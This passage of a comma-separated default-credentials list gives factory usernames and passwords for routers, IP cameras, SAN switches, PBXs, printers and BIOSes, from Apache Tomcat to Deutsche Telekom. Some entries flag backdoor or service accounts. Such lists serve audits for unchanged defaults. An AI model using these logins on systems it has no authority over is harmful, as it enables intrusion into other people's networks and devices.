-Apache,Tomcat,,HTTP,admin,admin,, -Apache,Tomcat,,HTTP,admin,tomcat,, -Apache,Tomcat,,HTTP,role,changethis,, -Apache,Tomcat,,HTTP,role1,role1,, -Apache,Tomcat,,HTTP,root,changethis,, -Apache,Tomcat,,HTTP,root,root,, -Apache,Tomcat,,HTTP,tomcat,changethis,, -Apache,Tomcat,,HTTP,tomcat,tomcat,, -Apache,Tomcat,5.5,HTTP,both,tomcat,, -Apache,Tomcat,5.5,HTTP,role1,tomcat,, -Apple Computer,Airport,,,,public,User, -Apple Computer,Network Assistant,,,,xyzzy,Administrator, -Apple Computer,Remote Desktop,,,,xyzzy,Administrator, -Apple,AirPort Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details -Apple,Airport Base Station (Dual Ethernet),2,Multi,,password,Guest,See Apple article number 106597 for details -Apple,Airport Extreme Base Station,2,Multi,,admin,Guest,see Apple article number 107518 for details -Apple,Airport,1.1,,,public,User, -Apple,Almost all iOS devices,>4.2,SSH,root,alpine,, -Apple,Network Assistant,,,,xyzzy,admin, -Apple,airport5,1.0.09,Multi,root,admin,Admin,192.168.1.1 -Apple,iPhone,,,mobile,dottie,, -Apple,iPhone,,,root,alpine,Administrator, -Applied Innovations,AIscout,,Multi,scout,scout,supervisor, -Areca,RAID controllers,,Console,admin,0,Admin, -Areca,RAID controllers,Any,,admin,0,Administrator,http://ArecaIP:81 -Arecont Vision,IP Camera system,,HTTP,admin,,, -Arescom,modem/router,10XX,Telnet,,atc123,Admin, -Armenia,Forum,,Multi,admin,admin,Admin, -Arris,TG862,,admin,admin,password,admin, -Arris,Touchstone Gateway,,HTTP,admin,password,Administrator, -Arrowpoint,,,,,,, -Arrowpoint,,,,admin,system,Administrator, -Arrowpoint,any?,,,admin,system,, -Aruba,Mobility Controller,,,admin,admin,Administrator,then 'enable' and default password 'admin' -Asante,FM2008,,Multi,admin,asante,Admin, -Asante,FM2008,,Telnet,superuser,,Admin, -Asante,FM2008,01.06,Telnet,superuser,asante,Administrator, -Asante,IntraStack,,multi,IntraStack,Asante,Admin, -Asante,IntraSwitch,,Multi,IntraSwitch,Asante,Admin, 
-Asante,IntraSwitch,,multi,IntraSwitch,Asante,Admin, -Ascend,All TAOS models,all,,admin,Ascend,Admin, -Ascend,Router,,Telnet,,ascend,Admin, -Ascend,Router,,Telnet,,ascend,Administrator, -Ascend,Sahara,,Multi,root,ascend,, -Ascend,Yurie,,Multi,readonly,lucenttech2,, -Ascend,Yurie,,Multi,readonly,lucenttech2,Read, -Ascom,Ascotel PBX,,Multi,,3ascotel,Admin, -Ascom,Ascotel PBX,ALL,Multi,,3ascotel,Admin, -Ascom,Ascotel,,,,3ascotel,Administrator,https://pbxweb.aastra.com/extra/support/attachments/KnowledgeBase/00887/Ascotel_2050_with_AIP6400_.pdf -Asmax,Ar-804u,,HTTP,admin,epicrouter,Admin, -Aspect,ACD,6,HTTP,customer,,User, -Aspect,ACD,6,HTTP,customer,,User,views error logs -Aspect,ACD,6,Oracle,DTA,TJM,User, -Aspect,ACD,7,Oracle,DTA,TJM,User, -Aspect,ACD,8,Oracle,DTA,TJM,User, -Asus,520g,,,admin,admin,Administrator, -Asus,DSL-AC55U,ANY,HTTP,admin,admin,Administrator,Default IP: 192.168.1.1 -Asus,P5P800,,Multi,,admin,User, -Asus,RT-N16,,HTTP,admin,admin,Administrator, -Asus,RT-N56U,ANY,admin,admin,HTTP,Administrator, -Asus,TM-AC1900,3.0.0.4.376_3221,WPA2-Personal,admin,admin,Administrator, -Asus,WL-500G,,,admin,admin,Administrator, -Asus,WL-HDD2.5,,,admin,admin,Administrator,Default IP: 192.168.1.220 -Asus,WL500g Deluxe,,HTTP,admin,admin,Admin, -Asus,wl300,All,HTTP,admin,admin,Admin, -Asus,wl500,,HTTP,admin,admin,, -Asus,wl500,All,HTTP,admin,admin,Admin, -Asus,wl503g,All,HTTP,admin,admin,Admin, -Atlantis,A02-RA141,,Multi,admin,atlantis,Admin, -Atlantis,I-Storm Lan Router ADSL,,Multi,admin,atlantis,Admin, -Atlassian,Crowd,2.6.2,,Crowd,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Atlassian,Crowd,2.6.2,,Demo,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Atlassian,Crowd,2.6.2,,Username,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Atlassian,Crowd,2.6.2,,crowd-openid-server,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Attachmate,Attachmate 
Gateway,,Console,,PASSWORD,Admin, -Attachmate,Attachmate Gateway,,Console,,PASSWORD,Administrator, -Audioactive,MPEG Realtime Encoders,,Telnet,,telos,Admin, -Audioactive,MPEG Realtime Encoders,,Telnet,,telos,Administrator, -Autodesk,Autocad,,Multi,autocad,autocad,User, -Avaya,4602 SIP Telephone,1.1,HTTP,admin,barney,, -Avaya,CMS Supervisor,11,Console,root,cms500,Admin, -Avaya,Cajun Pxxx,,Multi,root,root,Admin, -Avaya,Cajun,P550R P580 P880 and P882,Multi,diag,danger,Developer, -Avaya,Cajun,P550R P580 P880 and P882,Multi,manuf,xxyyzz,Developer, -Avaya,Cajun,P550R P580 P880,Multi,diag,danger,Developer, -Avaya,Cajun,P550R P580 P880,Multi,manuf,xxyyzz,Developer, -Avaya,Cajun,P550R/P580/P880/P882,Multi,diag,danger,Developer, -Avaya,Cajun,P550R/P580/P880/P882,Telnet,,,Admin, -Avaya,Definity,,,dadmin,dadmin,Administrator, -Avaya,Definity,,Multi,dadmin,dadmin01,Admin, -Avaya,Definity,G3Si,Multi,craft,,Admin, -Avaya,Integrated Management Database (IMD),,,admin,admin123,Administrator, -Avaya,Intuity Audix,,,Craft,crftpw,, -Avaya,P330 Stackable Switch,,Telnet,root,root,Administrator, -Avaya,Pxxx,41761,Multi,diag,danger,Admin, -Avaya,Pxxx,41761,Multi,manuf,xxyyzz,Admin, -Avaya,Pxxx,5.2.14,Multi,manuf,xxyyzz,Admin, -Avaya,Pxxx,5/2/2014,Multi,diag,danger,Admin, -Avaya,Pxxx,5/2/2014,Multi,manuf,xxyyzz,Admin, -Avaya,Scopia Gateway,,HTTP,admin,password,Administrator,https://downloads.avaya.com/css/P8/documents/100181785 -Avaya,Scopia,,HTTP,admin,admin,Administrator,https://downloads.avaya.com/css/P8/documents/100173462 -Avaya,Winspm,,,,Craftr4,, -Avaya,definity,up to rev. 
6,any,craft,crftpw,Admin, -Avaya,routers,,telnet,root,root,Administrator, -Avenger News System (ANS),ANS,,HTTP,,Administrative,,default string: admin:aaLR8vE.jjhss:root@127.0.0.1pass file is located at ans_data/ans.passwd (relative to ans.pl location) -Avigilon,IP Camera system,,HTTP,admin,admin,, -Avocent,Cyclade,Linux hostnamehere 2.6.11 #1Tue Mar 2813:31:20 PST 2006 ppc unknown,Multi,root,tslinux,Admin,http://www.cyclades.com.au -Avocent,Cyclade,Linux hostnamehere,Multi,root,tslinux,Admin,http://www.cyclades.com.au -Axent,NetProwler manager,WinNT,,administrator,admin,, -Axis Communications,Axis Network Camera,2120/2110/2100/200+/200,ftp,root,pass,Administrator, -Axis Communications,Axis Network Camera,2120/2110/2100/200+/200,http,root,pass,Administrator, -Axis Communications,Axis Network Camera,2120/2110/2100/200+/200,telnet,root,pass,Administrator, -Axis Communications,Printserver,540/540+,Multi,root,pass,Administrator, -Axis,540/542 Print Server,,Multi,root,pass,Admin, -Axis,All Axis Printserver,All,Multi,root,pass,Admin, -Axis,Camera Server,2100/2120/2420,,root,pass,Administrator, -Axis,IP Camera system,,HTTP,root,,, -Axis,NETCAM,200/240,,root,pass,, -Axis,NETCAM,200/240,Telnet,root,pass,Admin, -Axis,Printserver,540/540+,Multi,root,pass,Admin, -Axis,StorPoint CD E100,,,root,pass,Administrator, -Axis,StorPoint NAS 100,,,root,pass,Administrator, -Axis,Webcams,,HTTP,root,pass,Admin, -Axway,SecureTransport,,HTTP,setup,setup,,https://cdn.axway.com/u/documentation/secure_transport/5.3.0/SecureTransport_GettingStartedGuide_allOS_en.pdf -Aztecj,DSL 600EU,62.53.2,HTTP,isp,isp,Admin,backdoor - not in all f/w versions -Aztecj,DSL 600EU,62.53.2,Telnet,root,admin,Admin, -B-FOCuS,B-FOCuS 270/400,,,root,1234,admin, -BBR-4MG and BBR-4HG,Buffalo,ALL,HTTP,root,,Admin, -BBR-4MG and,BUFFALO,ALL,HTTP,root,,Admin, -BEA,WebLogic Process Integrator,2,,joe,password,User, -BEA,WebLogic Process Integrator,2,,system,security,Admin, -BEA,Weblogic,5.1,,system,weblogic,, -BMC 
Software,Patrol,all,BMC unique,Administrator,the same all over,Admin,this default user normally for ALL system in this area with one Password -BMC,Patrol,6,Multi,patrol,patrol,User, -BT,BT Mobile Hotspot,,HTTP,,admin,,https://btbusiness.custhelp.com/app/answers/detail/a_id/26793/~/how-do-i-change-passwords-or-reset-to-defaults-on-a-bt-mobile-hotspot%3F#reset -BUFFALO,WLAR-L11-L / WLAR-L11G-L,,HTTP,root,,Admin, -Basler,IP Camera system,,HTTP,admin,admin,, -Bausch Datacom,Proxima PRI ADSL PSTN Router4 Wireless,,Multi,admin,epicrouter,Admin, -Bausch Datacom,Proxima PRI ADSL PSTN,,Multi,admin,epicrouter,Admin, -Bay Networks,Router,,,User,,User, -Bay Networks,Router,,Telnet,Manager,,Admin, -Bay Networks,Router,,Telnet,User,,User, -Bay Networks,SuperStack II,,,security,security,Admin, -Bay Networks,SuperStack II,,Telnet,security,security,Admin, -Bay Networks,Switch,350T,,,NetICs,Admin, -Bay Networks,Switch,350T,Telnet,,NetICs,Admin, -Beck,IPC@Chip,,HTTP,anonymous,,User, -Beck,IPC@Chip,,HTTP,tel,,User, -Beetel,ADSL Modem,220X,Multi,admin,password,Admin,Beetel Model Provided By Airtel In India -Belkin,F5D6130,,SNMP,,MiniAP,Admin, -Belkin,F5D6130,,SNMP,,MiniAP,Admin,Wireless Acess Point IEEE802.11b -Belkin,F5D7150,FB,Multi,,admin,Admin, -Benq,awl 700 wireless router,1.3.6 Beta-002,Multi,admin,admin,Admin, -Billion,BIPAC-640 AC,640AE100,HTTP,,,Admin, -Billion,Bipac 5100,,HTTP,admin,admin,Admin, -BinTec,Bianca/Brick,XM-5.1,SNMP,,snmp,, -BinTec,Bianca/Brick,XM-5.1,SNMP,,snmp-Trap,read/write, -BinTec,x1200,37834,Multi,admin,bintec,, -BinTec,x1200,37834,Multi,admin,bintec,Admin, -BinTec,x2300i,37834,Multi,admin,bintec,, -BinTec,x2300i,37834,Multi,admin,bintec,Admin, -BinTec,x3200,37834,Multi,admin,bintec,, -BinTec,x3200,37834,Multi,admin,bintec,Admin, -Bintec,Bianka Routers,,Multi,admin,bintec,Admin, -Bintec,all Routers,Any,,admin,bintec,, -BioData,all Babylon Boxes,,,,Babylon,Admin, -Biostar,PC BIOS,,Console,,Q54arwms,Admin, -BizDesign,ImageFolio 
Pro,2.2,HTTP,Admin,ImageFolio,Admin, -Blue Coat Systems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface -Blue Coat Systems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface via ssh and web gui -Bluecoat,ProxySG (all model),SGOS 3 / SGOS4,HTTPS (8082),admin,admin,Admin, -Borland,Interbase,Any,,politcally,correct,Admin, -Borland/Inprise,Interbase,any,,SYSDBA,masterkey,, -Bosch Dinion,IP Camera system,,HTTP,admin,,, -Bosch,IP Camera system,,HTTP,service,service,, -Bosch,NWC-0455 Dinion IP Cameras,,,live,live,monitor - low priv, -Bosch,NWC-0455 Dinion IP Cameras,,,service,service,admin,may work in other bosch ipcameras -Bosch,NWC-0455 Dinion IP Cameras,,,user,user,regular user, -Boston,router simulator,3.66,HTTP,admin,admin,User, -Boston,router simulator,3.66,Multi,,admin,Admin, -BreezeCOM,,3.x,,,Master,, -BreezeCOM,Station Adapter and Access Point,4.x,,,Super,, -Breezecom,Breezecom Adapters,2.x,,,laflaf,, -Breezecom,Breezecom Adapters,2.x,,,laflaf,Admin, -Breezecom,Breezecom Adapters,3.x,,,Master,, -Breezecom,Breezecom Adapters,3.x,,,Master,Admin, -Breezecom,Breezecom Adapters,4.4.x,Console,,Helpdesk,Admin, -Breezecom,Breezecom Adapters,4.x,,,Super,, -Brickcom,IP Camera system,,HTTP,admin,admin,, -Broadlogic,XLT router,,HTTP,webadmin,webadmin,Admin, -Broadlogic,XLT router,,Telnet,admin,admin,Admin, -Broadlogic,XLT router,,Telnet,installer,installer,Admin, -Brocade,Fabric OS,,,factory,Fact4EMC,wipe?,I think this may wipe the device -Brocade,Fabric OS,,,root,Serv4EMC,root, -Brocade,Fabric OS,,Multi,admin,password,Admin,Gigabit SAN -Brocade,Fabric OS,5320,,user,password,user,Also on other SAN equipment -Brocade,Fabric OS,All,Multi,root,fivranne,Admin,Gigiabit SAN -Brocade,Fiberchannel Switches,,Multi,admin,password,Admin, -Brocade,Silkworm,all,Multi,admin,password,Admin,Also on other Fiberchannel switches -Brother,HL-1270n,,Multi,,access,network board access, -Brother,HL-1270n,,Telnet,,access,Admin, 
-Brother,HL-5250DN,ANY,admin,admin,access,Administrator, -Brother,HL-5350DN,ANY,admin,admin,access,Administrator, -Brother,HL5270DN,,HTTP,admin,access,Admin, -Brother,MFC-420CN,Firmware Ver.C,Multi,,access,Admin,multifunction printer copier -Brother,MFC-7225,,,admin,access,admin, -Brother,NC-2100p,,Multi,,access,Admin,NC-2100p Print Server -Brother,NC-3100h,,,,access,network board access, -Brother,NC-3100h,,Telnet,,access,Admin, -Brother,NC-4100h,,,,access,network board access, -Brother,NC-4100h,,Telnet,,access,Admin, -Buffalo Technology,TeraStation,,Multi,admin,password,Admin, -Buffalo,WHR-G300N,,,root,,Administrator, -Buffalo,Wireless Broadband Base Station-g,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1 -Buffalo,Wireless Broadband Base,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1 -Buffalo/MELCO,AirStation WLA-L11,,,root (cannot be changed),,Admin, -CBC Ganz,IP Camera system,,HTTP,admin,admin,, -CISCO,,,,pixadmin,pixadmin,, -CISCO,2600,,TELNET,Administrator,admin,admin, -CISCO,3600,,TELNET,Administrator,admin,admin, -CISCO,AIR-AP1231G-A-K9,,HTTP,Cisco,Cisco,Administrator,User/pass are case sensitive. 
-CISCO,CVA 122,,TELNET,admin,admin,admin, -CISCO,Cache Engine,,Console,admin,diamond,Admin, -CISCO,RTP300 W/2 PHONE PORTS,,HTTP,admin,admin,admin, -CISCO,RTP300 W/2 PHONE PORTS,,HTTP,user,tivonpw,, -CISCO,SF300,,HTTP,cisco,cisco,admin, -CNB,IP Camera system,,HTTP,root,admin,, -CNET,CNET 4PORT ADSL MODEM,,MULTI,admin,epicrouter,, -CNET,CNET 4PORT ADSL MODEM,CNAD NF400,Multi,admin,epicrouter,Admin, -CNET,CSH-2400W,unk,HTTP,admin,1234,Admin, -CNet,CWR- 500 Wireless-B Router,,,Admin,admin,Admin, -COM3,OLe,,HTTP,admin,admin,User, -CTC Union,ATU-R130,81001a,Multi,root,root,Admin, -Cable And Wireless,ADSL Modem/Router,,Multi,admin,1234,Admin, -Cabletron,Netgear modem/router and SSR,,,netman,,Admin, -Cabletron,Netgear modem/router,,,netman,,Admin, -Cabletron,any,any,,,,, -Cabletron/Enterasys,WebView for Matrix E1 (1G694-13 or 1G582-09 or 1H582-51) switch,,HTTP,,,Admin, -Calix,Residential Gateway,,,admin,admin,, -Calix,Router,,HTTP,admin,,, -Canonical Ltd.,Ubuntu,,,ubuntu,ubuntu,Admin, -Cassandra,CassandraDB,,Any,cassandra,cassandra,Admin, -Cayman,3220-H DSL Router,GatorSurf 5,,Any,,, -Cayman,Cayman DSL,,,,,Admin, -Celerity,Mediator,,Multi,root,Mau'dib,Admin, -Celerity,Mediator,,Multi,root,Mau’dib,Admin, -Celerity,Mediator,Multi,Multi,mediator,mediator,User, -Cellit,CCPro,,Multi,cellit,cellit,Admin, -Centreon,Web UI,18.10,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/18.10/installation/from_VM.html -Centreon,Web UI,19.04,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/19.04/installation/from_VM.html -Centreon,Web UI,19.10,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/19.10/installation/from_VM.html -Centreon,Web UI,2.8,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/2.8/installation/from_VM.html -Checkpoint,SecurePlatform,NG FP3,Console,admin,admin,Admin, -CipherTrust,IronMail,Any,Multi,admin,password,Admin, -Cisco,1900,,Multi,,,Admin, -Cisco,2501,,Telnet,,,Admin, -Cisco,2503,,,,,, 
-Cisco,3600,,Telnet,,,Admin, -Cisco,AP1200,IOS,Multi,Cisco,Cisco,Admin,This is when you convert AP1200 or AP350 to IOS -Cisco,Aironet 1200,,HTTP,root,Cisco,Admin, -Cisco,Aironet,,Multi,,_Cisco,Admin, -Cisco,Aironet,,Multi,Cisco,Cisco,Admin, -Cisco,Any Router and Switch,10 - 12,,cisco,cisco,, -Cisco,BBSD MSDE Client,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,NULL,database,The BBSD Windows Client password will match the BBSD MSDE Client password -Cisco,BBSM Administrator,5.0 and 5.1,Multi,Administrator,changeme,Admin, -Cisco,BBSM MSDE Administrator,5.0 and 5.1,IP and Named Pipes,sa,,Admin, -Cisco,BBSM,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,changeme2,database,The BBSD Windows Client password will match the BBSD MSDE Client password -Cisco,CNR,All,CNR GUI,admin,changeme,Admin,This is the default password for Cisco Network Registrar -Cisco,Cache Engine,,Console,admin,diamond,Admin, -Cisco,CallManager,,HTTP,admin,admin,Admin,nabil ouchn -Cisco,Catalyst 4000/5000/6000,All,SNMP,,public/private/secret,RO/RW/RW+change SNMP config,default on All Cat switches running the native CatOS CLI software. -Cisco,Cisco Wireless Location Appliance,2700 Series prior to 2.1.34.0,Multi,root,password,Admin, -Cisco,CiscoWorks 2000,,,admin,cisco,Admin, -Cisco,CiscoWorks 2000,,,guest,,User, -Cisco,Ciso Aironet 1100 series,Rev. 
01,HTTP,,Cisco,Admin, -Cisco,ConfigMaker,,,cmaker,cmaker,Admin, -Cisco,Content Engine,,Telnet,admin,default,Admin, -Cisco,HSE,,Multi,hsa,hsadb,Admin, -Cisco,HSE,,Multi,root,blender,Admin, -Cisco,Hot Standby Routing Protocol,,HSRP,,cisco,Admin, -Cisco,IOS,,Multi,,Cisco router,, -Cisco,IOS,,Multi,,cc,, -Cisco,IOS,,Multi,cisco,cisco,, -Cisco,IOS,,Multi,ripeop,(no pw),, -Cisco,IOS,,SNMP,private ReadWrite access,secret,Read/Write, -Cisco,IOS,12.1(3),SNMP,,cable-docsis,SNMP read-write, -Cisco,IOS,2600 series,Multi,,c,,but these are common misconfigurations -Cisco,MGX,,,superuser,superuser,Admin, -Cisco,MeetingPlace,,Console,technician,2 + last 4 of Audio Server chasis Serial case-sensitive+ 561384,Admin,Used for Audio Server or MeetingTime software -Cisco,Netranger/secure IDS,,Multi,netrangr,attack,, -Cisco,Netranger/secure IDS,3.0(5)S17,Multi,root,attack,Admin,must be changed at the first connection -Cisco,Network Registar,3.0,,ADMIN,changeme,Admin, -Cisco,ONS,all,Multi,CISCO15,otbu+1,Admin,Optical Network System - http/TL1 -Cisco,PIX firewall,,Multi,,,Admin, -Cisco,PIX firewall,,Telnet,,cisco,User, -Cisco,PIX,6.3,Console,enable,,Admin, -Cisco,RV130,,,cisco,cisco,admin, -Cisco,Router,1,Multi,,,Admin, -Cisco,VPN 3000 Concentrator,,,admin,admin,, -Cisco,VPN Concentrator 3000 series,3,Multi,admin,admin,Admin, -Cisco,WLSE,,Multi,root,blender,Admin, -Cisco,WLSE,,Multi,wlse,wlsedb,Admin, -Cisco,WLSE,all,Console,enable,,enable,use with wlseuser -Cisco,WSLE,all,all,wlseuser,wlsepassword,User,see also enable passwd -Cisco,aironet,,Multi,,,Admin, -Cisco,pix,,Multi,,,Admin, -Cisco-Arrowpoint,Arrowpoint,,,admin,system,Admin, -Citel,Handset Gateway,,HTTP,citel,password,Admin, -Citel,Handset Gateway,,Telnet,,citel,Admin, -Cobalt,RaQ * Qube*,Any,,admin,admin,, -Colubris,MSC,,HTTP,admin,admin,User,for all Colubris Devices -Com21,General Equipment(?),,,,,Admin, -Comcast Home Networking,Comcast Home Networking,ALL,HTTP,comcast,,Admin, -Comersus,Shopping Cart,3.2,HTTP,admin,dmr99,Admin, 
-Compaq,Armada E500,pp2060,Multi,Administrator,admin,Admin, -Compaq,Armada M700,,Console,Administrator,admin,Guest, -Compaq,Insight Manager,,,PFCUser,240653C9467E45,User, -Compaq,Insight Manager,,,administrator,administrator,Admin, -Compaq,Insight Manager,,,anonymous,,User, -Compaq,Insight Manager,,,operator,operator,, -Compaq,Insight Manager,,,user,public,User, -Compaq,Insight Manager,,,user,user,User, -Compaq,Insight Manager,,Multi,,,Admin, -Compaq,Management Agents,All,,administrator,,Admin, -Compaq,PC BIOS,,Console,,Compaq,Admin, -Compaq,dc770t,,Multi,,,Admin, -Compualynx,Cmail Server,Any,Multi,administrator,asecret,Admin, -Compualynx,SCM,Any,Multi,administrator,asecret,Admin, -Comtrend,ct-536+,,HTTP,admin,1234,Admin, -Comtrend,ct-536+,,HTTP,admin,admin,Admin, -Conceptronic,C54BRS4,,Multi,admin,1234,Admin,Its a Generic Router From Conceptronic - Probably they can be all the same -Concord,PC BIOS,,,,last,Admin, -Conexant,Router,,HTTP,,admin,Admin,yes -Conexant,Router,,HTTP,,epicrouter,Admin, -Corecess,6808 APC,,Telnet,corecess,corecess,User, -Corecess,Corecess 3112,,HTTP,Administrator,admin,Admin, -Costar,IP Camera system,,HTTP,root,root,, -Coyote-Point,Equaliser 4,Free BSD,Serial,eqadmin,equalizer,Admin, -Coyote-Point,Equaliser 4,Free BSD,Serial,root,,Admin, -Crossbeam,COS/XOS,,Lilo boot,,x40rocks,Admin,At the LILO boot prompt type linux single -Crystalview,OutsideView 32,,,,Crystal,Admin, -CyberMax,PC BIOS,,Console,,Congress,Admin, -CyberPower,Remote Management Card RMCARD302,ANY,HTTP,cyber,cyber,Administrator,https://cdn.cnetcontent.com/25/1e/251e4f4c-b12e-4d32-860a-491a9bc5059a.pdf -CyberPower,Remote Management Card RMCARD302,ANY,HTTP,device,cyber,Viewer,https://cdn.cnetcontent.com/25/1e/251e4f4c-b12e-4d32-860a-491a9bc5059a.pdf -Cyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin, -Cyclades,Cyclades-TS800,TS800,telnet/ssh/ web,root,,Admin, -Cyclades,MP/RT,,,super,surt,Admin, -Cyclades,PR 1000,,Telnet,super,surt,Admin,mpacheco.inimigo.com 
-Cyclades,TS800,,HTTP,root,tslinux,Admin,mpacheco.inimigo.com -D-LINK,DSL-G664T,A1,HTTP,admin,admin,Admin,SSID : G664T_WIRELESS -D-Link,AC1200,,HTTP,admin,admin,, -D-Link,AC1740,,HTTP,admin,admin,, -D-Link,AC1750,,HTTP,admin,1234,, -D-Link,Cable/DSL Routers/Switches,,Multi,,admin,Admin, -D-Link,D-704P,,Multi,admin,admin,Admin, -D-Link,D-704P,rev b,Multi,admin,,Admin, -D-Link,DCM-604,,HTTP,admin,password,, -D-Link,DFE-538TX 10/100 Adapter,,,,,Admin, -D-Link,DFL-300,,DHCP,admin,admin,Administrator,https://www.manualslib.com/manual/356725/D-Link-Dfl-300.html#manual -D-Link,DGN2200M,,HTTP,admin,dareadsl,, -D-Link,DI-101,,,,meet,123456mj, -D-Link,DI-104,,,,admin,patel, -D-Link,DI-106 ISDN router,,,,1234,Admin, -D-Link,DI-514,,Multi,user,,Admin, -D-Link,DI-524,E1,Telnet,Alphanetworks,wrgg15_di524,Admin,Password is actually firmware image signature. (use hex editor on .bin) -D-Link,DI-524,all,HTTP,admin,,Admin,http://192.168.0.1 -D-Link,DI-524,all,HTTP,user,,User, -D-Link,DI-604,1.62b+,HTTP,admin,,Admin, -D-Link,DI-604,1.8,Multi,admin,,Admin, -D-Link,DI-604,2.02,HTTP,admin,admin,Admin, -D-Link,DI-604,rev a rev b rev c rev e,Multi,admin,,Admin,http://192.168.0.1 -D-Link,DI-614+,,HTTP,admin,admin,Admin, -D-Link,DI-614+,,HTTP,user,,User, -D-Link,DI-614+,any,HTTP,admin,,Admin, -D-Link,DI-624+,A3,HTTP,admin,admin,Admin, -D-Link,DI-624,all,HTTP,User,,Admin, -D-Link,DI-624,all,HTTP,admin,,Admin, -D-Link,DI-634M,,Multi,admin,,Admin, -D-Link,DI-701,,Multi,,year2000,Admin, -D-Link,DI-704,,,,admin,Admin, -D-Link,DI-704,,Multi,,admin,Admin, -D-Link,DI-704,rev a,Multi,,admin,Admin,Cable/DSL Routers/Switches -D-Link,DI-804,v2.03,Multi,admin,,Admin, -D-Link,DIR-650IN,,HTTP,admin,admin,admin, -D-Link,DSA-31003,,,admin,admin,admin, -D-Link,DSA-51003,,,admin,admin,admin, -D-Link,DSL-2750U,ADSL2/2+,,admin,admin,Administrator,https://www.dlinkmea.com/partner/media/product_item_downloadables/9146-DSL-2750U_C1_Manual_v1.00(ET).pdf -D-Link,DSL-300g+,Teo,HTTP,admin,admin,Admin, 
-D-Link,DSL-302G,,Multi,admin,admin,Admin, -D-Link,DSL-500,,Multi,admin,admin,, -D-Link,DSR-1000,,,admin,admin,admin, -D-Link,DWL 1000,,HTTP,admin,,Admin, -D-Link,DWL 2100AP,,Multi,admin,,Admin, -D-Link,DWL 900AP,,Multi,,public,Admin, -D-Link,DWL 900AP,,Multi,admin,public,Admin, -D-Link,DWL-2000AP+,1.13,HTTP,admin,,Admin,Wireless Access Point -D-Link,DWL-614+,2.03,HTTP,admin,,Admin, -D-Link,DWL-614+,rev a rev b,HTTP,admin,,Admin,http://192.168.0.1 -D-Link,DWL-900+,,HTTP,admin,,Admin, -D-Link,DWL-G730AP,1.1,HTTP,admin,,Admin,http://192.168.0.30 -D-Link,Dl 604,1.8,Multi,admin,,Admin, -D-Link,Dsl-300g+,Teo,Telnet,,private,Admin, -D-Link,G624T,,Multi,admin,admin,Admin, -D-Link,WBR-1310,B-1,Multi,admin,,Admin, -D-Link,firewall,dfl-200,HTTP,admin,admin,Admin, -D-Link,hubs/switches,,Telnet,D-Link,D-Link,, -D-link,504g adsl router,,HTTP,admin,admin,Admin,from product doco -D-link,DSL-504T,,HTTP,admin,admin,Admin, -D-link,DSL-G604T,,Multi,admin,admin,Admin, -D-link,DSL500G,,Multi,admin,admin,Admin, -D-link,DWL-900AP+,rev a rev b rev c,HTTP,admin,,Admin,http://192.168.0.50 -D-link,Di-707p router,,HTTP,admin,,Admin, -D-link,ads500g,,HTTP,admin,admin,Admin, -D9287ar,Pavilion6640c,,,Clarissa,,, -DELL,REMOTE ACCESS CARD,,HTTP,root,calvin,, -DI624,D-LINK,C3,HTTP,admin,password,Admin,hardcoded for Verizon FiOS -DIGICOM,Michelangelo Wave108,,HTTP,root,admin,Admin, -DLINK,604,,Multi,,admin,Admin, -DLink,DI-206 ISDN router,1.*,,Admin,Admin,, -DVTel,IP Camera system,,HTTP,Admin,1234,, -DZS - DASAN Zhone,ZNID-GPON-2426A-EU,S3.1.330,HTTP,user,user,,just for checking and tests -Daewoo,PC BIOS,,Console,,Daewuu,Admin, -Dahua,IP Camera system,,HTTP,admin,admin,, -Dallas Semiconductors,TINI embedded JAVA Module,<= 1.0,Telnet,root,tini,Admin, -Datacom,BSASX/101,,,,letmein,Admin, -Datawizard.net,FTPXQ server,,FTP,anonymous,any@,read/write on c:, -Davolink,DV2020,,HTTP,user,user,unknown, -Davox,Unison,,Multi,admin,admin,User, -Davox,Unison,,Multi,davox,davox,User, 
-Davox,Unison,,Multi,root,davox,Admin, -Davox,Unison,,Sybase,sa,,Admin, -Daytek,PC BIOS,,Console,,Daytec,Admin, -Debian,Linux LILO Default,2.2,Console,,tatercounter2000,Admin, -Deerfield,MDaemon,,HTTP,MDaemon,MServer,Admin, -Deerfield,MDaemon,,HTTP,MDaemon,MServer,Admin,web interface to manage MDaemon. fixed June 2002 -Dell,2161DS Console Switch,,HTTP,Admin,,Admin,case sensitive username -Dell,CSr500xt,,Multi,,admin,Admin, -Dell,LATITUDE,D35B,Multi,,,Admin, -Dell,Laser Printer 3000cn / 3100cn,,HTTP,admin,password,Admin, -Dell,Latitude,Bios D35B,Multi,,1RRWTTOOI,Admin, -Dell,PC BIOS,,Console,,Dell,Admin, -Dell,PowerApp Web 100 Linux,RedHat 6.2,HTTP,root,powerapp,Admin, -Dell,PowerConnect 2724,,HTTP,admin,,Admin, -Dell,PowerVault 50F,WindRiver,,root,calvin,, -Dell,Remote Access Card,,HTTP,root,calvin,Admin, -Dell,TrueMobile 1184 Wireless Broadband Gateway Router,unknown,HTTP,admin,admin,Admin, -Dell,WRTA-108GD,,,admin,admin,Admin,192.168.2.1 -Dell,bios,d35b,Multi,,,Admin, -Dell,c600,595b,Multi,,,User, -Dell,cpx h500gt,,Multi,,,Admin, -Dell,dell latitude cpx,,Multi,admin,admin,User, -Dell,latitude c610,a07,Multi,admin,admin,Admin, -Dell,notebook,,Multi,,,Admin, -Demarc,Network Monitor,,multi,admin,my_DEMARC,Admin, -Deutsch Telekomm,T-Sinus 130 DSL,,HTTP,,0,Admin, -Deutsche Telekom,T-Sinus 1054 DSL,All,HTTP,,0,Admin, -Deutsche Telekom,T-Sinus 154 DSL,13.9.38,HTTP,,0,Admin, -Deutsche 